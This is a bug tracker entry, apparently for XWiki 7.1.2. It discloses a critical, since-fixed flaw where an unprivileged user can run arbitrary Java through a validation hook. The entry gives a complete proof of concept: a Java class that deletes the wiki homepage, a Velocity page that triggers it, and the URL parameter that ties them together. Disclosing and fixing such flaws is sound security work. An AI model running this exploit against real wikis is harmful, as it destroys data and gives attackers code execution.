Details
-
Bug
-
Resolution: Fixed
-
Critical
-
7.1.2
-
None
-
Unit
-
Unknown
-
N/A
-
N/A
-
Description
With an unprivileged user, create a document (let's call it Sandbox.hack) with the following content:
import com.xpn.xwiki.validation.*; import com.xpn.xwiki.*; import com.xpn.xwiki.doc.*; import com.xpn.xwiki.objects.*; public class XV implements com.xpn.xwiki.validation.XWikiValidationInterface { public boolean validateDocument(XWikiDocument doc, XWikiContext context) { context.getWiki().deleteDocument(context.getWiki().getDocument('Main.WebHome', context), context); return true; } public boolean validateObject(BaseObject object, XWikiContext context) { return true; } }
Then write a new page (let's call it Sandbox.callHack) with the following content:
{{velocity}}
$doc.validate()
{{/velocity}}
Save and view it with /bin/Sandbox/callHack?xvalidation=Sandbox.hack
Oops, the homepage is gone!